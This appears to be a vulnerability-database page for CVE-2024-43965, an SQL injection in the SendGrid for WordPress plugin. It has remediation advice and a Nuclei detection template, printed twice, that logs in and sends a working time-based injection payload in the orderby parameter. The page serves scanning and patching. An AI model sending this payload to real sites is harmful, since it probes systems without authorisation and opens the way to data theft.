SendGrid for WordPress <= 1.4 - SQL Injection

CVE-2024-43965

Verified

Description

Smackcoders SendGrid for WordPress [affected versions 1.4 and below] contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries, exploit requires crafted input.

Severity

Critical

CVSS Score

9.8

Exploit Probability

18%

Published Date

February 18, 2026

Template Author

shivam kamboj

CVE-2024-43965.yaml

id: CVE-2024-43965

info:
  name: SendGrid for WordPress <= 1.4 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Smackcoders SendGrid for WordPress [affected versions 1.4 and below] contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of SendGrid for WordPress, version 1.5 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-43965
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-sendgrid-mailer/sendgrid-for-wordpress-14-unauthenticated-sql-injection
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-43965
    epss-score: 0.18426
    epss-percentile: 0.95323
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,wp-sendgrid-mailer,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=wp-mailplus-logs&orderby=sent_time%2c(select*from(select(sleep(8)))a)&order=asc HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'duration >= 8'
          - 'contains_all(body, "wp-mailplus", "SendGrid")'
        condition: and
# digest: 4a0a00473045022100c45eb661646fa54b52d888f0cea080737dca1a674f48dc2e966b0497f979e86f02202a5deb981f67a1921871bcfd5373cff87363a7bcb359c935dc12fd46a08c883f:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2024-43965

CWE ID:

cwe-89

References

https://nvd.nist.gov/vuln/detail/CVE-2024-43965 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-sendgrid-mailer/sendgrid-for-wordpress-14-unauthenticated-sql-injection

Remediation Steps

Update to the latest version of SendGrid for WordPress, version 1.5 or later.

id: CVE-2024-43965

info:
  name: SendGrid for WordPress <= 1.4 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Smackcoders SendGrid for WordPress [affected versions 1.4 and below] contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of SendGrid for WordPress, version 1.5 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-43965
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-sendgrid-mailer/sendgrid-for-wordpress-14-unauthenticated-sql-injection
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-43965
    epss-score: 0.18426
    epss-percentile: 0.95323
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,wp-sendgrid-mailer,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=wp-mailplus-logs&orderby=sent_time%2c(select*from(select(sleep(8)))a)&order=asc HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'duration >= 8'
          - 'contains_all(body, "wp-mailplus", "SendGrid")'
        condition: and
# digest: 4a0a00473045022100c45eb661646fa54b52d888f0cea080737dca1a674f48dc2e966b0497f979e86f02202a5deb981f67a1921871bcfd5373cff87363a7bcb359c935dc12fd46a08c883f:922c64590222798bb761d5b6d8e72950

SendGrid for WordPress <= 1.4 - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

SendGrid for WordPress <= 1.4 - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps